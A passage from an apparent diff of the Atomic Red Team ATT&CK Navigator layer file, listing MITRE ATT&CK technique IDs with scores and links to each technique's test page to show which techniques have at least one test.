":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037